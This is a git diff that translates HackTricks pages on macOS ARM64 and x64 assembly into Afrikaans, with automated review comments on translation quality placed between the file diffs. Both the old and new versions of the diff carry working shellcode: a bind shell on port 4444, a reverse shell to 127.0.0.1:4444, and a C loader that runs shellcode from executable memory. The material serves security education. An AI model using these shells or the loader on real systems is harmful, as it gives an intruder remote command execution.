"/bin/cat" .align 2 passwd_path: .asciz "/etc/passwd" ``` - -#### Invoke command with sh from a fork so the main process is not killed - +#### Roep die bevel aan met sh vanuit 'n vurk sodat die hoofproses nie doodgemaak word nie ```armasm .section __TEXT,__text ; Begin a new section of type __TEXT and name __text .global _main ; Declare a global symbol _main .align 2 ; Align the beginning of the following code to a 4-byte boundary _main: - ; Prepare the arguments for the fork syscall - mov x16, #2 ; 
Load the syscall number for fork (2) into x8 - svc 0 ; Make the syscall - cmp x1, #0 ; In macOS, if x1 == 0, it's parent process, https://opensource.apple.com/source/xnu/xnu-7195.81.3/libsyscall/custom/__fork.s.auto.html - beq _loop ; If not child process, loop +; Prepare the arguments for the fork syscall +mov x16, #2 ; Load the syscall number for fork (2) into x8 +svc 0 ; Make the syscall +cmp x1, #0 ; In macOS, if x1 == 0, it's parent process, https://opensource.apple.com/source/xnu/xnu-7195.81.3/libsyscall/custom/__fork.s.auto.html +beq _loop ; If not child process, loop - ; Prepare the arguments for the execve syscall +; Prepare the arguments for the execve syscall - sub sp, sp, #64 ; Allocate space on the stack - mov x1, sp ; x1 will hold the address of the argument array - adr x0, sh_path - str x0, [x1] ; Store the address of "/bin/sh" as the first argument - adr x0, sh_c_option ; Get the address of "-c" - str x0, [x1, #8] ; Store the address of "-c" as the second argument - adr x0, touch_command ; Get the address of "touch /tmp/lalala" - str x0, [x1, #16] ; Store the address of "touch /tmp/lalala" as the third argument - str xzr, [x1, #24] ; Store NULL as the fourth argument (end of arguments) - - adr x0, sh_path - mov x2, xzr ; Clear x2 to hold NULL (no environment variables) - mov x16, #59 ; Load the syscall number for execve (59) into x8 - svc 0 ; Make the syscall +sub sp, sp, #64 ; Allocate space on the stack +mov x1, sp ; x1 will hold the address of the argument array +adr x0, sh_path +str x0, [x1] ; Store the address of "/bin/sh" as the first argument +adr x0, sh_c_option ; Get the address of "-c" +str x0, [x1, #8] ; Store the address of "-c" as the second argument +adr x0, touch_command ; Get the address of "touch /tmp/lalala" +str x0, [x1, #16] ; Store the address of "touch /tmp/lalala" as the third argument +str xzr, [x1, #24] ; Store NULL as the fourth argument (end of arguments) + +adr x0, sh_path +mov x2, xzr ; Clear x2 to hold NULL (no 
environment variables) +mov x16, #59 ; Load the syscall number for execve (59) into x8 +svc 0 ; Make the syscall _exit: - mov x16, #1 ; Load the syscall number for exit (1) into x8 - mov x0, #0 ; Set exit status code to 0 - svc 0 ; Make the syscall +mov x16, #1 ; Load the syscall number for exit (1) into x8 +mov x0, #0 ; Set exit status code to 0 +svc 0 ; Make the syscall _loop: b _loop 
@@ -517,174 +467,169 @@ sh_c_option: .asciz "-c" .align 2 touch_command: .asciz "touch /tmp/lalala" ``` +#### Bind skulp -#### Bind shell - -Bind shell from [https://raw.githubusercontent.com/daem0nc0re/macOS\_ARM64\_Shellcode/master/bindshell.s](https://raw.githubusercontent.com/daem0nc0re/macOS\_ARM64\_Shellcode/master/bindshell.s) in **port 4444** - +Bind skulp vanaf [https://raw.githubusercontent.com/daem0nc0re/macOS\_ARM64\_Shellcode/master/bindshell.s](https://raw.githubusercontent.com/daem0nc0re/macOS\_ARM64\_Shellcode/master/bindshell.s) in **poort 4444** ```armasm .section __TEXT,__text .global _main .align 2 _main: call_socket: - // s = socket(AF_INET = 2, SOCK_STREAM = 1, 0) - mov x16, #97 - lsr x1, x16, #6 - lsl x0, x1, #1 - mov x2, xzr - svc #0x1337 +// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0) +mov x16, #97 +lsr x1, x16, #6 +lsl x0, x1, #1 +mov x2, xzr +svc #0x1337 - // save s - mvn x3, x0 +// save s +mvn x3, x0 call_bind: - /* - * bind(s, &sockaddr, 0x10) - * - * struct sockaddr_in { - * __uint8_t sin_len; // sizeof(struct sockaddr_in) = 0x10 - * sa_family_t sin_family; // AF_INET = 2 - * in_port_t sin_port; // 4444 = 0x115C - * struct in_addr sin_addr; // 0.0.0.0 (4 bytes) - * char sin_zero[8]; // Don't care - * }; - */ - mov x1, #0x0210 - movk x1, #0x5C11, lsl #16 - str x1, [sp, #-8] - mov x2, #8 - sub x1, sp, x2 - mov x2, #16 - mov x16, #104 - svc #0x1337 +/* +* bind(s, &sockaddr, 0x10) +* +* struct sockaddr_in { +* __uint8_t sin_len; // sizeof(struct sockaddr_in) = 0x10 +* sa_family_t sin_family; // AF_INET = 2 +* in_port_t sin_port; // 4444 = 0x115C +* struct in_addr sin_addr; // 0.0.0.0 (4 bytes) +* char sin_zero[8]; // Don't care +* }; +*/ +mov x1, #0x0210 +movk x1, #0x5C11, lsl #16 +str x1, [sp, #-8] +mov x2, #8 +sub x1, sp, x2 +mov x2, #16 +mov x16, #104 +svc #0x1337 call_listen: - // listen(s, 2) - mvn x0, x3 - lsr x1, x2, #3 - mov x16, #106 - svc #0x1337 +// listen(s, 2) +mvn x0, x3 +lsr x1, x2, #3 +mov x16, #106 +svc #0x1337 
call_accept: - // c = accept(s, 0, 0) - mvn x0, x3 - mov x1, xzr - mov x2, xzr - mov x16, #30 - svc #0x1337 +// c = accept(s, 0, 0) +mvn x0, x3 +mov x1, xzr +mov x2, xzr +mov x16, #30 +svc #0x1337 - mvn x3, x0 - lsr x2, x16, #4 - lsl x2, x2, #2 +mvn x3, x0 +lsr x2, x16, #4 +lsl x2, x2, #2 call_dup: - // dup(c, 2) -> dup(c, 1) -> dup(c, 0) - mvn x0, x3 - lsr x2, x2, #1 - mov x1, x2 - mov x16, #90 - svc #0x1337 - mov x10, xzr - cmp x10, x2 - bne call_dup +// dup(c, 2) -> dup(c, 1) -> dup(c, 0) +mvn x0, x3 +lsr x2, x2, #1 +mov x1, x2 +mov x16, #90 +svc #0x1337 +mov x10, xzr +cmp x10, x2 +bne call_dup call_execve: - // execve("/bin/sh", 0, 0) - mov x1, #0x622F - movk x1, #0x6E69, lsl #16 - movk x1, #0x732F, lsl #32 - movk x1, #0x68, lsl #48 - str x1, [sp, #-8] - mov x1, #8 - sub x0, sp, x1 - mov x1, xzr - mov x2, xzr - mov x16, #59 - svc #0x1337 +// execve("/bin/sh", 0, 0) +mov x1, #0x622F +movk x1, #0x6E69, lsl #16 +movk x1, #0x732F, lsl #32 +movk x1, #0x68, lsl #48 +str x1, [sp, #-8] +mov x1, #8 +sub x0, sp, x1 +mov x1, xzr +mov x2, xzr +mov x16, #59 +svc #0x1337 ``` +#### Omgekeerde skulp -#### Reverse shell - -From [https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/reverseshell.s](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/reverseshell.s), revshell to **127.0.0.1:4444** - +Vanaf [https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/reverseshell.s](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/reverseshell.s), revshell na **127.0.0.1:4444** ```armasm .section __TEXT,__text .global _main .align 2 _main: call_socket: - // s = socket(AF_INET = 2, SOCK_STREAM = 1, 0) - mov x16, #97 - lsr x1, x16, #6 - lsl x0, x1, #1 - mov x2, xzr - svc #0x1337 +// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0) +mov x16, #97 +lsr x1, x16, #6 +lsl x0, x1, #1 +mov x2, xzr +svc #0x1337 - // save s - mvn x3, x0 +// save s +mvn x3, x0 call_connect: - /* - * connect(s, &sockaddr, 0x10) - * - * struct sockaddr_in { - * 
__uint8_t sin_len; // sizeof(struct sockaddr_in) = 0x10 - * sa_family_t sin_family; // AF_INET = 2 - * in_port_t sin_port; // 4444 = 0x115C - * struct in_addr sin_addr; // 127.0.0.1 (4 bytes) - * char sin_zero[8]; // Don't care - * }; - */ - mov x1, #0x0210 - movk x1, #0x5C11, lsl #16 - movk x1, #0x007F, lsl #32 - movk x1, #0x0100, lsl #48 - str x1, [sp, #-8] - mov x2, #8 - sub x1, sp, x2 - mov x2, #16 - mov x16, #98 - svc #0x1337 +/* +* connect(s, &sockaddr, 0x10) +* +* struct sockaddr_in { +* __uint8_t sin_len; // sizeof(struct sockaddr_in) = 0x10 +* sa_family_t sin_family; // AF_INET = 2 +* in_port_t sin_port; // 4444 = 0x115C +* struct in_addr sin_addr; // 127.0.0.1 (4 bytes) +* char sin_zero[8]; // Don't care +* }; +*/ +mov x1, #0x0210 +movk x1, #0x5C11, lsl #16 +movk x1, #0x007F, lsl #32 +movk x1, #0x0100, lsl #48 +str x1, [sp, #-8] +mov x2, #8 +sub x1, sp, x2 +mov x2, #16 +mov x16, #98 +svc #0x1337 - lsr x2, x2, #2 +lsr x2, x2, #2 call_dup: - // dup(s, 2) -> dup(s, 1) -> dup(s, 0) - mvn x0, x3 - lsr x2, x2, #1 - mov x1, x2 - mov x16, #90 - svc #0x1337 - mov x10, xzr - cmp x10, x2 - bne call_dup +// dup(s, 2) -> dup(s, 1) -> dup(s, 0) +mvn x0, x3 +lsr x2, x2, #1 +mov x1, x2 +mov x16, #90 +svc #0x1337 +mov x10, xzr +cmp x10, x2 +bne call_dup call_execve: - // execve("/bin/sh", 0, 0) - mov x1, #0x622F - movk x1, #0x6E69, lsl #16 - movk x1, #0x732F, lsl #32 - movk x1, #0x68, lsl #48 - str x1, [sp, #-8] - mov x1, #8 - sub x0, sp, x1 - mov x1, xzr - mov x2, xzr - mov x16, #59 - svc #0x1337 +// execve("/bin/sh", 0, 0) +mov x1, #0x622F +movk x1, #0x6E69, lsl #16 +movk x1, #0x732F, lsl #32 +movk x1, #0x68, lsl #48 +str x1, [sp, #-8] +mov x1, #8 +sub x0, sp, x1 +mov x1, xzr +mov x2, xzr +mov x16, #59 +svc #0x1337 ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
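Review bot: the `{% endtab %}` that closed the first tab of the Shell tabs block is missing from the translated side. The removed lines include `-{% endtab %}`, a blank line and `-{% tab title="with stack" %}`, but the added lines go straight from the closing fence of the "met adr" tab to `+{% tab title="met stapel" %}`, so the first tab is never closed and the `{% tabs %}` block will not render. Re-insert `{% endtab %}` (plus the blank line) between the two tabs.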
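Review bot: every code block in this file lost its indentation and internal blank lines even though nothing inside a fence is translatable. The C loader (`+printf("[>] Shellcode Length: ...`, `+if (ptr == MAP_FAILED) {`), all the armasm listings (`+adr x0, sh_path`, `+mov x16, #59`) and the extract loop (`+echo -n '\\x'$c`) now start at column 0, and the bind/reverse shell listings lost the blank lines that separated the `call_socket:`, `call_bind:` and `call_execve:` groups. A translation commit should leave fenced code byte-for-byte identical to the English source; please regenerate with code fences excluded so the diff shows only the actual text changes.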
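Review bot: several technical terms were translated where they must stay as identifiers, or are rendered inconsistently across this patch. "Lees met kat" translates the `cat` binary name (keep `cat`); "Skulp", "Bind skulp" and "Omgekeerde skulp" use the seashell sense of shell rather than the command interpreter; `r13` is "Stakpunt" and `r11` "Raampunt" here while the x64 page in the same patch writes "Stapelwyser" for stack pointer; "gedekomponeerde" (decomposed) stands in for "decompiled"; and "BSD-sysoproepe" sits beside "stelseloproepe" for syscalls. There is also a grammar slip in the AIF bullet: "En die F is verband hou met" should read "en die F hou verband met". Suggest fixing a short glossary (shell, shellcode, syscall, stack pointer, frame pointer, decompiled) and applying it to all files in the patch.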
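Review bot: the register and CPSR bullet lists changed list marker and dropped emphasis, e.g. `-* **`r15`**: Program counter (always).` became `+- `r15`: Programteller (altyd).`, and the same happened to the APSR and Execution State bullets, while the footer list in the same hunk keeps `* **...**`. Keep the original `*` marker and the bold/backtick markup so the translated page matches the rest of the book's formatting.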
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md index b9e57b4f1..c6851d6b0 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md @@ -1,123 +1,118 @@ -# Introduction to x64 +# Inleiding tot x64
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **Introduction to x64** +## **Inleiding tot x64** -x64, also known as x86-64, is a 64-bit processor architecture predominantly used in desktop and server computing. Originating from the x86 architecture produced by Intel and later adopted by AMD with the name AMD64, it's the prevalent architecture in personal computers and servers today. +x64, ook bekend as x86-64, is 'n 64-bis-processorargitektuur wat hoofsaaklik gebruik word in rekenaars en bedienerrekenaars. Dit het ontstaan uit die x86-argitektuur wat deur Intel vervaardig is en later deur AMD aangeneem is met die naam AMD64. Dit is die heersende argitektuur in persoonlike rekenaars en bedieners vandag. ### **Registers** -x64 expands upon the x86 architecture, featuring **16 general-purpose registers** labeled `rax`, `rbx`, `rcx`, `rdx`, `rbp`, `rsp`, `rsi`, `rdi`, and `r8` through `r15`. Each of these can store a **64-bit** (8-byte) value. These registers also have 32-bit, 16-bit, and 8-bit sub-registers for compatibility and specific tasks. +x64 brei uit op die x86-argitektuur en bevat **16 algemene doelregisters** genaamd `rax`, `rbx`, `rcx`, `rdx`, `rbp`, `rsp`, `rsi`, `rdi`, en `r8` tot `r15`. Elkeen van hierdie registers kan 'n **64-bis** (8-byte) waarde stoor. Hierdie registers het ook 32-bis, 16-bis en 8-bis subregisters vir verenigbaarheid en spesifieke take. -1. **`rax`** - Traditionally used for **return values** from functions. -2. **`rbx`** - Often used as a **base register** for memory operations. -3. **`rcx`** - Commonly used for **loop counters**. -4. **`rdx`** - Used in various roles including extended arithmetic operations. -5. **`rbp`** - **Base pointer** for the stack frame. -6. **`rsp`** - **Stack pointer**, keeping track of the top of the stack. -7. **`rsi`** and **`rdi`** - Used for **source** and **destination** indexes in string/memory operations. -8. **`r8`** to **`r15`** - Additional general-purpose registers introduced in x64. +1. 
**`rax`** - Tradisioneel gebruik vir **terugkeerwaardes** van funksies. +2. **`rbx`** - Dikwels gebruik as 'n **basisregister** vir geheue-operasies. +3. **`rcx`** - Gewoonlik gebruik vir **lus-tellers**. +4. **`rdx`** - Gebruik vir verskeie rolle, insluitend uitgebreide rekenkundige operasies. +5. **`rbp`** - **Basisaanwyser** vir die stapelraamwerk. +6. **`rsp`** - **Stapelwyser**, hou die boonste gedeelte van die stapel dop. +7. **`rsi`** en **`rdi`** - Gebruik vir **bron** en **bestemming** indekse in string/geheue-operasies. +8. **`r8`** tot **`r15`** - Addisionele algemene doelregisters wat in x64 ingevoer is. -### **Calling Convention** +### **Oproepkonvensie** -The x64 calling convention varies between operating systems. For instance: +Die x64-oproepkonvensie verskil tussen bedryfstelsels. Byvoorbeeld: -* **Windows**: The first **four parameters** are passed in the registers **`rcx`**, **`rdx`**, **`r8`**, and **`r9`**. Further parameters are pushed onto the stack. The return value is in **`rax`**. -* **System V (commonly used in UNIX-like systems)**: The first **six integer or pointer parameters** are passed in registers **`rdi`**, **`rsi`**, **`rdx`**, **`rcx`**, **`r8`**, and **`r9`**. The return value is also in **`rax`**. +* **Windows**: Die eerste **vier parameters** word oorgedra in die registers **`rcx`**, **`rdx`**, **`r8`**, en **`r9`**. Verdere parameters word op die stapel gedruk. Die terugkeerwaarde is in **`rax`**. +* **System V (gewoonlik gebruik in UNIX-soortgelyke stelsels)**: Die eerste **ses heelgetal- of aanwyserparameters** word oorgedra in die registers **`rdi`**, **`rsi`**, **`rdx`**, **`rcx`**, **`r8`**, en **`r9`**. Die terugkeerwaarde is ook in **`rax`**. -If the function has more than six inputs, the **rest will be passed on the stack**. **RSP**, the stack pointer, has to be **16 bytes aligned**, which means that the address it points to must be divisible by 16 before any call happens. 
This means that normally we would need to ensure that RSP is properly aligned in our shellcode before we make a function call. However, in practice, system calls work many times even if this requirement is not met. +As die funksie meer as ses insette het, sal die **res op die stapel oorgedra word**. **RSP**, die stapelwyser, moet **16 byte uitgelyn** wees, wat beteken dat die adres waarop dit wys, deur 16 deelbaar moet wees voordat enige oproep plaasvind. Dit beteken dat ons normaalweg moet verseker dat RSP behoorlik uitgelyn is in ons skelkode voordat ons 'n funksieoproep maak. In die praktyk werk stelseloproepe egter dikwels selfs as hierdie vereiste nie nagekom word nie. -### Calling Convention in Swift +### Oproepkonvensie in Swift -Swift have its own **calling convention** that can be found in [**https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#x86-64**](https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#x86-64) +Swift het sy eie **oproepkonvensie** wat gevind kan word in [**https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#x86-64**](https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#x86-64) -### **Common Instructions** +### **Gewone Instruksies** -x64 instructions have a rich set, maintaining compatibility with earlier x86 instructions and introducing new ones. +x64-instruksies het 'n ryk stel, wat verenigbaarheid met vorige x86-instruksies handhaaf en nuwes introduceer. -* **`mov`**: **Move** a value from one **register** or **memory location** to another. - * Example: `mov rax, rbx` — Moves the value from `rbx` to `rax`. -* **`push`** and **`pop`**: Push or pop values to/from the **stack**. - * Example: `push rax` — Pushes the value in `rax` onto the stack. - * Example: `pop rax` — Pops the top value from the stack into `rax`. -* **`add`** and **`sub`**: **Addition** and **subtraction** operations. 
- * Example: `add rax, rcx` — Adds the values in `rax` and `rcx` storing the result in `rax`. -* **`mul`** and **`div`**: **Multiplication** and **division** operations. Note: these have specific behaviors regarding operand usage. -* **`call`** and **`ret`**: Used to **call** and **return from functions**. -* **`int`**: Used to trigger a software **interrupt**. E.g., `int 0x80` was used for system calls in 32-bit x86 Linux. -* **`cmp`**: **Compare** two values and set the CPU's flags based on the result. - * Example: `cmp rax, rdx` — Compares `rax` to `rdx`. -* **`je`, `jne`, `jl`, `jge`, ...**: **Conditional jump** instructions that change control flow based on the results of a previous `cmp` or test. - * Example: After a `cmp rax, rdx` instruction, `je label` — Jumps to `label` if `rax` is equal to `rdx`. -* **`syscall`**: Used for **system calls** in some x64 systems (like modern Unix). -* **`sysenter`**: An optimized **system call** instruction on some platforms. +* **`mov`**: **Beweeg** 'n waarde van die een **register** of **geheueplek** na 'n ander. +* Voorbeeld: `mov rax, rbx` — Beweeg die waarde van `rbx` na `rax`. +* **`push`** en **`pop`**: Druk waardes na/van die **stapel**. +* Voorbeeld: `push rax` — Druk die waarde in `rax` na die stapel. +* Voorbeeld: `pop rax` — Haal die boonste waarde van die stapel na `rax`. +* **`add`** en **`sub`**: **Optel-** en **aftrekkingsoperasies**. +* Voorbeeld: `add rax, rcx` — Tel die waardes in `rax` en `rcx` bymekaar en stoor die resultaat in `rax`. +* **`mul`** en **`div`**: **Vermenigvuldigings-** en **delingsoperasies**. Let op: hierdie het spesifieke gedrag met betrekking tot operandgebruik. +* **`call`** en **`ret`**: Gebruik om funksies **aan te roep** en **terug te keer**. +* **`int`**: Gebruik om 'n sagteware-**onderbreking** te veroorsaak. Byvoorbeeld, `int 0x80` is gebruik vir stelseloproepe in 32-bis x86 Linux. +* **`cmp`**: Vergelyk twee waardes en stel die CPU se vlae in op grond van die resultaat. 
+* Voorbeeld: `cmp rax, rdx` — Vergelyk `rax` met `rdx`. +* **`je`, `jne`, `jl`, `jge`, ...**: **Voorwaardelike sprong**-instruksies wat beheervloei verander op grond van die resultate van 'n vorige `cmp` of toets. +* Voorbeeld: Na 'n `cmp rax, rdx`-instruksie, `je label` — Spring na `label` as `rax` gelyk is aan `rdx`. +* **`syscall`**: Gebruik vir **stelseloproepe** in sommige x64-stelsels (soos moderne Unix). +* **`sysenter`**: 'n Geoptimeerde **stelseloproep**-instruksie op sommige platforms. -### **Function Prologue** +### **Funksieproloog** -1. **Push the old base pointer**: `push rbp` (saves the caller's base pointer) -2. **Move the current stack pointer to the base pointer**: `mov rbp, rsp` (sets up the new base pointer for the current function) -3. **Allocate space on the stack for local variables**: `sub rsp, ` (where `` is the number of bytes needed) +1. **Druk die ou basisaanwyser na die stapel**: `push rbp` (stoor die basisaanwyser van die aanroeper) +2. **Beweeg die huidige stapelwyser na die basisaanwyser**: `mov rbp, rsp` (stel die nuwe basisaanwyser op vir die huidige funksie) +3. **Ken ruimte toe op die stapel vir plaaslike veranderlikes**: `sub rsp, ` (waar `` die aantal benodigde byte is) -### **Function Epilogue** - -1. **Move the current base pointer to the stack pointer**: `mov rsp, rbp` (deallocate local variables) -2. **Pop the old base pointer off the stack**: `pop rbp` (restores the caller's base pointer) -3. **Return**: `ret` (returns control to the caller) +### **Funksie-epiloog** +1. **Beweeg die huidige basisaanwyser na die stapelwyser**: `mov rsp, rbp` (deallokeer plaaslike veranderlikes) +2. **Haal die ou basisaanwyser van die stapel af**: `pop rbp` (herstel die basisaanwyser van die aanroeper) +3. 
**Keer terug**: `ret` (gee beheer terug aan die aanroeper) ## macOS ### syscalls -There are different classes of syscalls, you can [**find them here**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/osfmk/mach/i386/syscall\_sw.h)**:** - +Daar is verskillende klasse van syscalls, jy kan [**hulle hier vind**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/osfmk/mach/i386/syscall\_sw.h)**:** ```c #define SYSCALL_CLASS_NONE 0 /* Invalid */ -#define SYSCALL_CLASS_MACH 1 /* Mach */ +#define SYSCALL_CLASS_MACH 1 /* Mach */ #define SYSCALL_CLASS_UNIX 2 /* Unix/BSD */ #define SYSCALL_CLASS_MDEP 3 /* Machine-dependent */ #define SYSCALL_CLASS_DIAG 4 /* Diagnostics */ #define SYSCALL_CLASS_IPC 5 /* Mach IPC */ ``` - -Then, you can find each syscall number [**in this url**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/bsd/kern/syscalls.master)**:** - +Dan kan jy elke syscallnommer [**in hierdie url**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/bsd/kern/syscalls.master)**:** vind. 
```c 0 AUE_NULL ALL { int nosys(void); } { indirect syscall } -1 AUE_EXIT ALL { void exit(int rval); } -2 AUE_FORK ALL { int fork(void); } -3 AUE_NULL ALL { user_ssize_t read(int fd, user_addr_t cbuf, user_size_t nbyte); } -4 AUE_NULL ALL { user_ssize_t write(int fd, user_addr_t cbuf, user_size_t nbyte); } -5 AUE_OPEN_RWTC ALL { int open(user_addr_t path, int flags, int mode); } -6 AUE_CLOSE ALL { int close(int fd); } -7 AUE_WAIT4 ALL { int wait4(int pid, user_addr_t status, int options, user_addr_t rusage); } +1 AUE_EXIT ALL { void exit(int rval); } +2 AUE_FORK ALL { int fork(void); } +3 AUE_NULL ALL { user_ssize_t read(int fd, user_addr_t cbuf, user_size_t nbyte); } +4 AUE_NULL ALL { user_ssize_t write(int fd, user_addr_t cbuf, user_size_t nbyte); } +5 AUE_OPEN_RWTC ALL { int open(user_addr_t path, int flags, int mode); } +6 AUE_CLOSE ALL { int close(int fd); } +7 AUE_WAIT4 ALL { int wait4(int pid, user_addr_t status, int options, user_addr_t rusage); } 8 AUE_NULL ALL { int nosys(void); } { old creat } -9 AUE_LINK ALL { int link(user_addr_t path, user_addr_t link); } -10 AUE_UNLINK ALL { int unlink(user_addr_t path); } +9 AUE_LINK ALL { int link(user_addr_t path, user_addr_t link); } +10 AUE_UNLINK ALL { int unlink(user_addr_t path); } 11 AUE_NULL ALL { int nosys(void); } { old execv } -12 AUE_CHDIR ALL { int chdir(user_addr_t path); } +12 AUE_CHDIR ALL { int chdir(user_addr_t path); } [...] ``` +So om die `open` syscall (**5**) van die **Unix/BSD-klas** te roep, moet jy dit byvoeg: `0x2000000` -So in order to call the `open` syscall (**5**) from the **Unix/BSD class** you need to add it: `0x2000000` +Dus sal die syscall-nommer om open te roep `0x2000005` wees -So, the syscall number to call open would be `0x2000005` +### Shellkodes -### Shellcodes - -To compile: +Om te kompileer: {% code overflow="wrap" %} ```bash 
@@ -126,13 +121,13 @@ ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/Comm ``` {% endcode %} -To extract the bytes: +Om die bytes te onttrek: {% code overflow="wrap" %} ```bash # Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/extract.sh for c in $(objdump -d "shell.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do - echo -n '\\x'$c +echo -n '\\x'$c done # Another option @@ -142,8 +137,7 @@ otool -t shell.o | grep 00 | cut -f2 -d$'\t' | sed 's/ /\\x/g' | sed 's/^/\\x/g'
-C code to test the shellcode - +C-kode om die shellcode te toets ```c // code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c // gcc loader.c -o loader @@ -157,312 +151,301 @@ int (*sc)(); char shellcode[] = ""; int main(int argc, char **argv) { - printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode)); - - void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0); - - if (ptr == MAP_FAILED) { - perror("mmap"); - exit(-1); - } - printf("[+] SUCCESS: mmap\n"); - printf(" |-> Return = %p\n", ptr); - - void *dst = memcpy(ptr, shellcode, sizeof(shellcode)); - printf("[+] SUCCESS: memcpy\n"); - printf(" |-> Return = %p\n", dst); +printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode)); - int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ); +void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0); - if (status == -1) { - perror("mprotect"); - exit(-1); - } - printf("[+] SUCCESS: mprotect\n"); - printf(" |-> Return = %d\n", status); +if (ptr == MAP_FAILED) { +perror("mmap"); +exit(-1); +} +printf("[+] SUCCESS: mmap\n"); +printf(" |-> Return = %p\n", ptr); - printf("[>] Trying to execute shellcode...\n"); +void *dst = memcpy(ptr, shellcode, sizeof(shellcode)); +printf("[+] SUCCESS: memcpy\n"); +printf(" |-> Return = %p\n", dst); - sc = ptr; - sc(); - - return 0; +int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ); + +if (status == -1) { +perror("mprotect"); +exit(-1); +} +printf("[+] SUCCESS: mprotect\n"); +printf(" |-> Return = %d\n", status); + +printf("[>] Trying to execute shellcode...\n"); + +sc = ptr; +sc(); + +return 0; } ``` -
